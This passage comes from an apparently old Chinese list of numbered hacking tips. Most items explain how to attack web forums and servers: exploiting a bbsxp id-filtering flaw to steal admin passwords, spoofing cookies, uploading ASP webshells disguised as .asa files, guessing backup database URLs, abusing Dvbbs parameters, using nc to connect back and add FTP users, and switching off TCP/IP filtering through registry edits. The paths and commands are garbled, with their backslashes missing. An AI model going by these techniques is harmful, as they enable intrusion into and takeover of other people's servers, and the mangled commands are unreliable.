37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具：bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马

　　38.学会总结入侵思路http://www.77169.com/news/hk/2005060811688.html

　　39.电脑坏了省去重新安装系统的方法

　　纯dos下执行，

　　xp:copy c:windows epair*.* 到c:windowssystem32config

　　2k: copy c:winnt epair*.* 到c:winntsystem32config

　　40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱，因此当我的机子中了此木马后没有立即杀掉进程，而是用内存编辑工具打开它的进程，查找smtp字样，就会找到它的信箱和密码了。只对1.5以前的管用.

　　41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的

　　http://soft.77169.com/62/20050608/6878.html

　　42.有许多管理员用备份的日期做备份数据库的名字

　　比如http://www.hack6.com/bbs/databackup/20050601.mdb

　　43.动网数据库oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2

　　不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面

　　http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2

　　%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是“填写登录信息”

　　那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名

　　44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户

45.解决tcp/ip筛选 在注册表里有三处，分别是：

　　hkey_local_machinesystemcontrolset001services cpip

　　hkey_local_machinesystemcontrolset002services cpip

　　hkey_local_machinesystemcurrentcontrolsetservices cpip

　　分别用

　　regedit -e d:a.reg hkey_local_machinesystemcurrentcontrolsetservices cpip

　　regedit -e d:.reg hkey_local_machinesystemcontrolset002services cpip

　　regedit -e d:c.reg hkey_local_machinesystemcurrentcontrolsetservices cpip

　　命令来导出注册表项

　　然后把三个文件里的enablesecurityfilters"=dword:00000001，

　　改成enablesecurityfilters"=dword:00000000 再将以上三个文件分别用

　　regedit -s d:a.reg regedit -s d:.reg regedit -s d:c.reg 导入注册表即可

　　46.使chm木马无法在本地运行木马程序 将注册表"hkey_current_u

　　sersoftwaremicrosoftwindowscurrentversioninternet settingszones